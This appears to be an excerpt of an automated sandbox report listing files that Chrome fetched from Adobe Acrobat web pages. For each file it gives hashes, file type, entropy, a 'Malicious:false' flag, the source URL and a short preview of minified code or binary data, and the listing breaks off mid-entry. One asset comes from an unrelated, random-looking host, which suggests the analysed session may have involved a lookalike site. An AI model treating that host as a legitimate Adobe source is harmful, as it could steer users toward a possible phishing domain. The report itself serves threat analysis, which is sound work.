                  Preview:.asm.......dylink.0....H..]......`...`....`....`.....`.....`......`......`.......`.......`........`........`.........`..`.........`..........`..~.`...~`..........`...........`...`...}`..}.`..}..`..}}..`...~...`...........`...}..`....}.`............`..}...`..}...`.}.}`...~.`.}...`..}}}}..`....}`....~..`...}.`..~~~~.`.....}.`............`..~..~`.............`..~..`...~..`..~~..`.....~..`...~..`..............`..|.`...}..`.~...`.............`..}}..`..~.~`.}}.}`..~...`..}}.`......}.`..~...`..}..`...}}..`..}}}}}}..`.~~.~`..|`..|..`..~`...}.}`.|.}`.|..|`.}..`...}}}....`...}...`....~`......}}.`......~..`...............`.}.....`..~~.`......~`.....}`..}}}}}}}}...`...............`.................`..|......`.}..}`....~~..`....|..`.....~~..`.....|..`......~~..`.~..`...|`...|.|`..}}...`...}}}...`....~.~`..}}}}}}.`.~~~~..`..}}}.`..................`.....}..`........}}...`....}}}..`..~..~.`...}}}}}}}}...`....}}}}}}}}.`......}}....`...}}..`..~....`....||.....`.....~..`...}}.`..............}....`..}.}.}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):7039
                  Entropy (8bit):7.890708119436247
                  Encrypted:false
                  SSDEEP:
                  MD5:82C01E70A7FF19468BAD984CC87E90CD
                  SHA1:0E7848947B29FB6BF6E4AC58A68FD685A5DFBAB5
                  SHA-256:D0D536F99F92C69E893149B42F3D45BD369475DFDBFB6843E1DCCE3C5558B091
                  SHA-512:1BB4214EFE6DF4A7BEFCEEDE22025C40572FEE3F443275C8A558D0016E11BECE05ECDECD966807382BFF7A016D6E266DFCF1184A18F9860FC8852A911E0EA3AF
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/home/34df8e8885/pwa/pwa-images/acrobat_reader_pro_standard_appicons_macos11_256x256@1x.png
                  Preview:.PNG........IHDR.............\r.f....pHYs...........~....1IDATx....\ey..wf.cv7..*V.D4.( 5...Z<.A.....b...z......bH.ED)hQI).Q8J...%..6!'..@...5`...dwg..<w.w..2.w........g6....>...z..q]...|R..;!...@H.....c(......!9..@H.....c(......!9..@H.....c(......!9..@H.....c(......!9..@H.....c(......!9...7.8....>...?...vs:.;.c..Co...;..$[....g.......2z.......B.!..d......q...dJ.|+}.w.....+....."p.....T.$'....3.X.....'........DA?.....dB...^..Eu.n,.._Q..K..8....\.p\`b....................k.T.P...0.9...2>.........'$,...u[.W|.!.U..<.4.A*..q.3......!.z|.W.....K.*...W....xZB..g... U..d..XU.E.\9.......w.x..u|................P..^.K...../.A....<.S....[..O.).G..o ...[.....6........$.....C...&..A.D..2..8.[e.....a.$.:.kk..[^.j4...Hln ..0o.<g....?x.(.?.....GH[.\...)..D`F.@-.".8.....a.I%.U.^...GH j.o..]?....U..... Q.`....__.Y.+.:..HJ.m......^. I"....>...i......i.$....p..e\.`D.5.lUE+.$......#.n.........;].v...........].|.?D.'Yd....2.k.O...O../....u.?.*....b..............#"p}..(O.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (21567), with no line terminators
                  Category:downloaded
                  Size (bytes):21567
                  Entropy (8bit):5.424082578263437
                  Encrypted:false
                  SSDEEP:
                  MD5:37DBA9F4B9A4431C1650A7A9EE30FB89
                  SHA1:41B3DA95E95088A0F22E5A837AF8856B7F13E5BF
                  SHA-256:E2C6E9FAF309EC248579492EBDAB4D718E16872CEDF0DEF7536ABAF3C883662A
                  SHA-512:FD2CA98CE6654060EC9F22CAE800D832CB89B74D3680D1865E77ED7E2D8E539979DF0026DF98F18B7A5626E552B23B7B3F0B822F10FA69C1E30E62277399D018
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-sign-provider/3.61.0_9.16.0/bootstrap.js
                  Preview:(()=>{var e,n,a,t,r={843:(e,n,a)=>{var t={"./ca-ES/as-api-standalone-v6":[953,757],"./cs-CZ/as-api-standalone-v6":[556,726],"./da-DK/as-api-standalone-v6":[657,317],"./de-DE/as-api-standalone-v6":[215,275],"./en-GB/as-api-standalone-v6":[409,605],"./en-US/as-api-standalone-v6":[842,288],"./es-ES/as-api-standalone-v6":[13,709],"./eu-ES/as-api-standalone-v6":[63,507],"./fi-FI/as-api-standalone-v6":[807,167],"./fr-FR/as-api-standalone-v6":[829,185],"./hr-HR/as-api-standalone-v6":[693,149],"./hu-HU/as-api-standalone-v6":[271,899],"./id-ID/as-api-standalone-v6":[103,467],"./in-ID/as-api-standalone-v6":[5,989],"./is-IS/as-api-standalone-v6":[917,461],"./it-IT/as-api-standalone-v6":[719,883],"./ja-JP/as-api-standalone-v6":[74,792],"./ko-KR/as-api-standalone-v6":[200,554],"./ms-MY/as-api-standalone-v6":[803,523],"./nb-NO/as-api-standalone-v6":[452,118],"./nl-NL/as-api-standalone-v6":[385,193],"./nn-NO/as-api-standalone-v6":[840,786],"./no-NO/as-api-standalone-v6":[703,915],"./pl-PL/as-api-stan
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (9369)
                  Category:downloaded
                  Size (bytes):9420
                  Entropy (8bit):5.294105128282768
                  Encrypted:false
                  SSDEEP:
                  MD5:B38AEC2E27E575FAFEDBD9DF3E38017D
                  SHA1:4E7D574A12A5DCDFE0E019B840CB968146B921CC
                  SHA-256:37FBDB3976C7AE38543DF9D2417D15DCC8D725F2516193DBA9910C1E3F0D6070
                  SHA-512:046174DE4127A92B2A3139D9B0594CA19D7AC851DC818CF918FACBBA62B1DED0A6370DF4667EDC384287F2004175BEAA60ACECD77F4CF7F354E85E3422A80F74
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/platform-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="29163fa5-73d5-4ac7-a223-4c3307793dcb",e._sentryDebugIdIdentifier="sentry-dbid-29163fa5-73d5-4ac7-a223-4c3307793dcb")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[7745],{OR70:(e,t,o)=>{"use strict";o.r(t),o.d(t,{default:()=>m});var i=o("plsW"),r=o("4PKp");function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,i)}return o}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):111622
                  Entropy (8bit):5.663528837234454
                  Encrypted:false
                  SSDEEP:
                  MD5:954330226D8FA9A51BBA2326C94A004F
                  SHA1:93EA5726FFC0C4CC6AEDA6E85374CE597CCEE7AA
                  SHA-256:5D3F6B45D286270BB1696170A0CF637B1EF73A16125839F14B5D07A6625143F5
                  SHA-512:A24B5A1F05A45D8EB72002B9F7074D8D64C92FCCC1ACEC0D3A596C6DA4FCDA9A18106CA297587EB2A5E678BBC4E062B13953D192A86312D9264F2B050F6D6A35
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.06a6e3dda872b4c83bd1de13616f0fd4.js
                  Preview:var Module=void 0!==Module?Module:{};Error.stackTraceLimit=200,self.prejs_time=performance.now(),Error.prepareStackTrace=function(p,g){const f=`${p.name?p.name:""}, ${p.message?p.message:""}`;let A=g.map((function(p){return` at ${p.toString()}`})).join("\n");return A=A.replace(/(data:application\/javascript[^:\n\r]+)/g,"inlined_wasm.js"),`${f}\n${A}`};var moduleOverrides=Object.assign({},Module),arguments_=[],thisProgram="./this.program",quit_=(p,g)=>{throw g},ENVIRONMENT_IS_WEB="object"==typeof window,ENVIRONMENT_IS_WORKER="function"==typeof importScripts,ENVIRONMENT_IS_NODE="object"==typeof process&&"object"==typeof process.versions&&"string"==typeof process.versions.node,scriptDirectory="",read_,readAsync,readBinary;function locateFile(p){return Module.locateFile?Module.locateFile(p,scriptDirectory):scriptDirectory+p}if(ENVIRONMENT_IS_NODE){var fs=require("fs"),nodePath=require("path");scriptDirectory=ENVIRONMENT_IS_WORKER?nodePath.dirname(scriptDirectory)+"/":__dirname+"/",read_
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (7104)
                  Category:downloaded
                  Size (bytes):7158
                  Entropy (8bit):5.238454896108336
                  Encrypted:false
                  SSDEEP:
                  MD5:41D64515D352D278C7188E75568731E5
                  SHA1:ACFB19E1553FFE9F1D9C492B4E1B61034F88012F
                  SHA-256:5AADC8132B41A7459DBA07763A5400BA4264AD18B34402E7D74BB910CD5CF026
                  SHA-512:16E37ECA09EB020F3E92F9B4E780F890216941A2F7235510B41B207281A3739C567F49BAEBAB6DB84008FB9DC7EFF86BCAE8335D80B60E204762F7C820BB4F2D
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/3.46.1_6.220.0/ajsProvider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-rendition"]=self["webpackJsonp-rendition"]||[]).push([[90],{gTnC:(e,t,a)=>{a.r(t),a.d(t,{default:()=>AcrobatJSProvider});var n=a("4PKp"),i=a("plsW"),r=a("0VNB"),s=a("6Wbc");class OrganizeApisManager{constructor(){this.validIntents=["organize-pdf","delete-pages","extract-pages","insert-pdf","reorder-pages","rotate-pages","number-pages"],this.intent=null,this.nonce=null}async validateIntent(e){if(!e||!this.validIntents.includes(e))throw new Error(s.Sg.INVALID_INTENT)}async organizeWillBegin(e){const{intent:t,fileUrl:a}=e;a||(e.fileUrl="localFileUrl");try{await this.validateIntent(t),this.intent=t}catch(e){throw e}}static getDcApiClientId(){let e="dc-local-virgoweb";return"prod"===i.envUtil.getHostEnv()?e="dc-prod-virgoweb":"stage"===i.envUtil.getHostEnv()?e="dc-stage-virgoweb":"dev"===i.envUtil.getHostEnv()&&(e="dc-dev-virgoweb"),e}async fetchToken(){const e=(await i.providers.dcapi()).getDcapi(),t=(0,r.v4)(),a=OrganizeApisManager.getDcApiClientId();try{v
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65442)
                  Category:downloaded
                  Size (bytes):185550
                  Entropy (8bit):5.633585570490466
                  Encrypted:false
                  SSDEEP:
                  MD5:2446E93B8E888E4BEBE5C13191117340
                  SHA1:8544DC0FF20721E2E6A0B86D02CEED25E59C51B8
                  SHA-256:43568B75ACC474025D1C68F6FFD29DC9C197587EA078D61E9A13B2DAD528A57B
                  SHA-512:43D772B9037EFD9BA94FF0A9F405FDBCF44C8C9FAFE7F2315BB2F64F10F61761391C044F96539DC5F49AAC3AD884090D7F6FE04DB7D027921D6A359A78B03786
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/acrobatProxy_we.60db765eaf19dc146b68.js
                  Preview:/*! For license information please see acrobatProxy_we.60db765eaf19dc146b68.js.LICENSE.txt */.var AcrobatJS;(()=>{var F={8127:(F,x,D)=>{var M={"./digsig.wasm":7588,"./digsig.wasm.symbols":1205,"./digsig2.wasm":5158,"./digsig2.wasm.symbols":3275,"./digsig_we.wasm":8449,"./digsig_we.wasm.symbols":1076,"./dummy_split.wasm.symbols":1597,"./libcld.wasm":833,"./libcld.wasm.symbols":3572,"./libcld2.wasm":8793,"./libcld2.wasm.symbols":1836,"./libcld_we.wasm":2038,"./libcld_we.wasm.symbols":5531,"./libjp2k.wasm":1493,"./libjp2k.wasm.symbols":4600,"./libjp2k2.wasm":4757,"./libjp2k2.wasm.symbols":7672,"./libjp2k_we.wasm":26,"./libjp2k_we.wasm.symbols":2767,"./libxml.wasm":1965,"./libxml.wasm.symbols":2016,"./libxml2.wasm":3501,"./libxml2.wasm.symbols":4944,"./libxml_we.wasm":898,"./libxml_we.wasm.symbols":2519,"./licensing.wasm":3183,"./licensing.wasm.symbols":8166,"./licensing2.wasm":695,"./licensing2.wasm.symbols":7086,"./licensing_we.wasm":1208,"./licensing_we.wasm.symbols":5017,"./wasm_acroba
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3057)
                  Category:downloaded
                  Size (bytes):3102
                  Entropy (8bit):4.737460614348812
                  Encrypted:false
                  SSDEEP:
                  MD5:E2F115E02610D5774E5C751B23D12DCA
                  SHA1:2308DA3C790F0CAF5208776BD46A55B44C7F7BFD
                  SHA-256:81EEB896FC539198B57A7DCC8A388FA7C90C02CACA419C9BC16EFC52D4D690EA
                  SHA-512:B0119A5B43AE46A8DC4512DA5B99C0D58B7159DEC78E14C763FFB5DE595A59EEF0650169D4DAFB30F3BE193FB72B1268807DE201E12F10863FF19994BE7724DB
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/nav-icon.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[2657],{Gsnt:(e,a,l)=>{var i=l("YWiy");function SDCCombineFiles18N(e){return i.createElement("svg",e,i.createElement("g",null,[i.createElement("path",{d:"M3.55534,6.8205c-.37329.59879-.739.97552-.95352.97552a.15414.15414,0,0,1-.09625-.033.13692.13692,0,0,1-.04742-.13681C2.50215,7.41172,2.92355,7.10167,3.55534,6.8205Zm1.29726-.739c-.12238.033-.244.06668-.36574.10312q.099-.199.17737-.38774c.066-.16637.13268-.32861.1918-.49153.05156.08111.10381.1588.1588.23648a4.701,4.701,0,0,0,.3403.42142C5.35513,5.95981,5.019,6.03681,4.8526,6.0815ZM4.51642,3.11436a.14721.14721,0,0,1,.12924-.08113c.14024,0,.16982.16982.16982.31006a3.91746,3.91746,0,0,1-.18494.98651A1.71455,1.71455,0,0,1,4.51642,3.11436ZM7.1618,6.38464a.25735.25735,0,0,1-.28048.17737.47072.47072,0,0,1-.12581-.01512,2.08148,2.08148,0,0,1-.80571-.4063,4.00716,4.00716,0,0,1,.59878-.04467,2.10432,2.10432,0,0,1,.39873.02955C7.06212,6.144,7.19481,6.21072,7.1618,
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (6632)
                  Category:downloaded
                  Size (bytes):6725
                  Entropy (8bit):4.815386393157721
                  Encrypted:false
                  SSDEEP:
                  MD5:93B9ACE62366EE2621BD63F5937E93E5
                  SHA1:52BA0FFF722949C4B3B978D7976BE4814C11D5A0
                  SHA-256:09274898CBBE69883AA09F5D7C8E9D906ECB8645BB64FAC38545B46F372B65A8
                  SHA-512:222E289E9701CFF95A067F7187F1BDD396E86B5304A836AC46D9A1A8554C03F9C0DB5528C916121EBB91EF2B95E69271F0C85859F528BACE8CDC0BB6296F39FB
                  Malicious:false
                  Reputation:unknown
                  URL:https://prod.adobeccstatic.com/unav/1.4/layout.bundle.css
                  Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container .unav-comp-error{display:flex;padding:1rem 0;gap:.5rem;flex-direction:column;justify-content:center;align-items:center;flex:1 0 0;align-self:center}.universal-nav-container .unav-comp-error .error-msg{color:#505050;text-align:center;font-size:.875rem;font-style:normal;font-weight:400;line-height:150%}.universal-nav-container .unav-comp-error .error-cta{color:#0265dc;font-size:.875rem;font-family:inherit;font-weight:400;word-wrap:break-word}.universal-nav-container .unav-comp-help-popover .unav-comp-error{width:15rem;height:9rem}.universal-nav-container .unav-comp-app-switcher-popover .unav-comp-error{width:21rem;height:34rem}.universal-nav-container .app-switcher-skeleton-header{display:flex;padding:0 .5rem 1rem .5rem;align-items:center;gap:1rem;align-self:stretch;width:100%}.universal-nav-container .app-switcher-skeleton-header .app-switcher-skeleton-header-label-wrapp
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65468)
                  Category:downloaded
                  Size (bytes):933140
                  Entropy (8bit):5.59969146102341
                  Encrypted:false
                  SSDEEP:
                  MD5:181CC109DB77F7A9F02430663E7EDBEC
                  SHA1:1795816015350B7E5114A9B8E5124D5789EF9F1E
                  SHA-256:3EDCB4B78C758183BCB14AEFB8CFB7F29FA0AF2FB2506F377AF085554C59E578
                  SHA-512:1BE5BA094924AB3DA1245EB83D2CF16B2AD7ABC34B579C29B2F93E0E6FE8DA9018C9AFF6668F5BFAD7B273C7CFDF71ACC59BD61390CBCFC0562CC67D89B2CE29
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-edit-dropin/3.17.0_3.90.0/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,i,o,r={fRNs:(e,t,i)=>{"use strict";i.d(t,{Z:()=>o});const o=new class AnalyticsService{constructor(){this._callbacks=[],this._events=[],this._isRequestIdleCallbackScheduled=!1,this._processPendingEvents=e=>{this._isRequestIdleCallbackScheduled=!1;let t=e;for(void 0===t&&(t={didTimeout:!0,timeRemaining:()=>Number.MAX_VALUE});t.timeRemaining()>0;){const e=this._events.shift();if(void 0===e)return;this._callbacks.forEach((t=>{void 0!==t.rootType&&e.root.type!==t.rootType||t.listener(e)}))}this._events.length>0&&this._scheduleEvents()}}track(e,t,i,o,r,n,a){if(0===this._callbacks.length)return;const s=this._getElementData(i,!1),l=this._getElementData(r,!0);o&&"subCollection"in o&&o.subCollection===o.collection&&(o.subCollection=void 0);const c={action:e,options:o??{},root:{feature:l.feature,type:l.type},target:{feature:s.feature,type:s.type},timeEnd:n??Date.now(),version:t};a&&Object.keys(a).length>0&&(c.option
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:downloaded
                  Size (bytes):268
                  Entropy (8bit):5.111190711619041
                  Encrypted:false
                  SSDEEP:
                  MD5:59759B80E24A89C8CD029B14700E646D
                  SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                  SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                  SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/rsTHqIzYKeyUuzAhwjbtVijmObXjNVfLWEheHUuRlqqzdnv0Ehref200
                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (51087)
                  Category:downloaded
                  Size (bytes):51146
                  Entropy (8bit):5.635678960894289
                  Encrypted:false
                  SSDEEP:
                  MD5:F8082A69DB2F2FB1C61EF50447BD9793
                  SHA1:E20C43DFBB6249EAE7B335EBFD1F527EE996ECA2
                  SHA-256:0A1ECD956603A389E71EFC183A223368E42BA5DB68892A350E97B5526AC65F85
                  SHA-512:43D68578CD675650D5EEA6D3803785543643D9AE74369F019078DF133E220F1FB1AAFB425028FAA125F379812C249D7EBB70AABA5DB1463A8FBF418F001A85A4
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/multiDocProvider-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[1979],{"+Rv1":(e,t,n)=>{"use strict";t.V=function A4uAlertCircle(e){var t=_extends({},e);return i.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),i.default.createElement("path",{fillRule:"evenodd",d:"M18.1,2.2A15.9,15.9,0,1,0,34,18.1,15.9,15.9,0,0,0,18.1,2.2Zm0,29.812A13.912,13.912,0,1,1,32.012,18.1,13.912,13.912,0,0,1,18.1,32.012Z"}),i.default.createElement("path",{fillRule:"evenodd",d:"M15.69111,25.77237a2.26833,2.26833,0,0,1,2.23219-2.3039q.084-.00132.16781.00356a2.23208,2.23208,0,0,1,2.4,2.30034,2.18145,2.18145,0,0,1-2.4,2.23322,2.18156,2.18156,0,0,1-2.4-2.23322ZM20.125,8.79542a.41583.41583,0,0,1,.19932.36611v2.08271c0,2.80068-.56644,7.96068-.6661,8.96135,0,.09966-.03356.19933-.2339.19933H16.75789a.2214.2214,0,0,1-.2339-.19933c-.0661-.93356-.6-6.061-.6-8.86169V9.26119a.35461.35461,0,0,1,.16678-.36611,5.76552,5.76552,0,0,1,2.00034-.40067A6.5494,6.5494,0,0,1,20.125,8.79542Z"}))};var i=function _interop
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (21153)
                  Category:downloaded
                  Size (bytes):21198
                  Entropy (8bit):5.25805249193
                  Encrypted:false
                  SSDEEP:
                  MD5:376720A464999CA070023C46BBBC3485
                  SHA1:E66DD567410A395A0CE0FA2D6AC1C17CC040D1C2
                  SHA-256:3C765EA7F588E6471E3A6AC85F10CAA2626A54094E552C0DBF23E9BF406518A5
                  SHA-512:FBAC0C560CB8166E0EFF336547AA44F5B3FAACD113704B99E57C2AEEAAEB0724405B4D0677B4A59E4B68B1B45184E00D086245AC99A37A06A6A09B801DF59B00
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/beta-api.js
                  Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[961],{lPy7:(e,r,t)=>{var n,i=t("TESC");r=e.exports=SemVer,n="object"==typeof i&&i.env&&i.env.NODE_DEBUG&&/\bsemver\b/i.test(i.env.NODE_DEBUG)?function(){var e=Array.prototype.slice.call(arguments,0);e.unshift("SEMVER"),console.log.apply(console,e)}:function(){},r.SEMVER_SPEC_VERSION="2.0.0";var o=256,s=Number.MAX_SAFE_INTEGER||9007199254740991,a=r.re=[],c=r.src=[],l=0,p=l++;c[p]="0|[1-9]\\d*";var u=l++;c[u]="[0-9]+";var h=l++;c[h]="\\d*[a-zA-Z-][a-zA-Z0-9-]*";var f=l++;c[f]="("+c[p]+")\\.("+c[p]+")\\.("+c[p]+")";var m=l++;c[m]="("+c[u]+")\\.("+c[u]+")\\.("+c[u]+")";var v=l++;c[v]="(?:"+c[p]+"|"+c[h]+")";var d=l++;c[d]="(?:"+c[u]+"|"+c[h]+")";var g=l++;c[g]="(?:-("+c[v]+"(?:\\."+c[v]+")*))";var w=l++;c[w]="(?:-?("+c[d]+"(?:\\."+c[d]+")*))";var S=l++;c[S]="[0-9A-Za-z-]+";var b=l++;c[b]="(?:\\+("+c[S]+"(?:\\."+c[S]+")*))";var y=l++,V="v?"+c[f]+c[g]+"?"+c[b]+"?";c[y]="^"+V+"$";var I="[v=\\s]*"+c[m]+c[w]+"?"+c[b]+"?",E=l
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 102944, version 1.0
                  Category:downloaded
                  Size (bytes):102944
                  Entropy (8bit):7.99480451844518
                  Encrypted:true
                  SSDEEP:
                  MD5:0ADE0AC02379319A17A7D874800530F6
                  SHA1:3E48A94CC2D416A0FD2E86EEDB117259E0744C98
                  SHA-256:8D32258390E213CE160670108CB49F27B40C6FBB2E67C5809181D6744ECF968B
                  SHA-512:9D490428C80A819DB046D5454A7D51DBEDDAC1CFE5D933A3024639D15489E1B5BCB9B607AFE6A04ED282AB51A29652E062B5448505AB1DC4BD4BD7726061029E
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/74ffb1/000000000000000000017702/27/l?subset_id=1&fvd=i4&v=3
                  Preview:wOF2OTTO... ......j..............................F...:?DYNA.|?GDYN.%...z..,.`..F...6.$..,....~. [.i...<p......aF.V{....t...UUUUU5-!..UU.@..........'.....7...../.....?.....c.>L.v\..pT.vg>a,.l..`"...:.u....=k..<..MNb.E.3.E.i...}.+..sDB......<...,... .5...:.'@..*.).....'.7.%d...{7..>`2w4..JJ.b-.Q...FS..xwg...E0.Q@.[...5.D1......s.7.}.pj.$V...)....J...@..<..).$.r.\DN..N.~...E..|....:P..........JSNJG.O..n..^......[k...XZ.JQ.4..w.{.{..`....X*`....(.(.......y.G..y^7_.I..os.Z...v.p....f..vXCH../y.(...'.p.k..Q@ApGM.Z....n.Gd[.8..KX...zg..0...P...0%..xb@..HTA.3Q1a..L......x.....L..TZw.?.*.3..B.i.....;.....r..`...._..V...X..2:......P.K.V.....U....CS.4........)Lm?.d.T.d. ..9`s.(<..x..?s'.p...6B)....~1.|....L%...I........><....6........|..v....t..lr.."......"..?.k...m.8.....Y.oUo..mm.k.F.k41..b4u!...~.H..".u!.l..,..d'.gR...-p.D.......!.... .E.#h..?tWi.(..e...C..hn...dtf!B.QJ....dD..26.f*....j....$@m.H..fj#..t{E#m......J.. .? e. .....W..k..z@E.$...Q.%.d_r*..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:dropped
                  Size (bytes):7390
                  Entropy (8bit):4.02755241095864
                  Encrypted:false
                  SSDEEP:
                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                  Malicious:false
                  Reputation:unknown
                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (19147)
                  Category:downloaded
                  Size (bytes):19193
                  Entropy (8bit):5.243462211250301
                  Encrypted:false
                  SSDEEP:
                  MD5:BB0AED615655CD6E9F104B7E15408849
                  SHA1:19B35D7E3373794710E25E692CACA8271D763938
                  SHA-256:E7390F3C1A8D03BE97AE2440197421CD98956DA6F34BCE2B0B80A2E53FD1C225
                  SHA-512:7CFDDFFFB8DFA4AC514A394D24933659FBC57AA728F80EA1E0451C738FE8880BA46B53F6D154932EF785B2623A66B2FF8F1AC76C470F85729A0B5396107E2417
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/bootstrap.js
                  Preview:(()=>{var e,_,r,a,i={plsW:(e,_,r)=>{e.exports=r("2pFd")("o4sN")},"2pFd":e=>{"use strict";e.exports=window.adobe_dc_sdk["dc-core"]},U2o4:e=>{"use strict";e.exports=window.adobe_dc_sdk["dc-extras"]},M2Fx:e=>{"use strict";e.exports=window.adobe_dc_sdk["dc-mobx"]},SEmX:e=>{"use strict";e.exports=window.adobe_dc_sdk["dc-spectrum-v3-core"]}},n={};function __webpack_require__(e){var _=n[e];if(void 0!==_)return _.exports;var r=n[e]={id:e,exports:{}};return i[e].call(r.exports,r,r.exports,__webpack_require__),r.exports}__webpack_require__.m=i,__webpack_require__.amdO={},__webpack_require__.n=e=>{var _=e&&e.__esModule?()=>e.default:()=>e;return __webpack_require__.d(_,{a:_}),_},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(r,a){if(1&a&&(r=this(r)),8&a)return r;if("object"==typeof r&&r){if(4&a&&r.__esModule)return r;if(16&a&&"function"==typeof r.then)return r}var i=Object.create(null);__webpack_require__.r(i);var n={};e=e||[null,_({}),_([]),_(_)
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65465)
                  Category:downloaded
                  Size (bytes):806118
                  Entropy (8bit):5.573222695809508
                  Encrypted:false
                  SSDEEP:
                  MD5:D9F7F88BEC67D76A13C553CF5CF4455D
                  SHA1:8D494F8CCCFDA2824EC109A06F84915E03EF3C4F
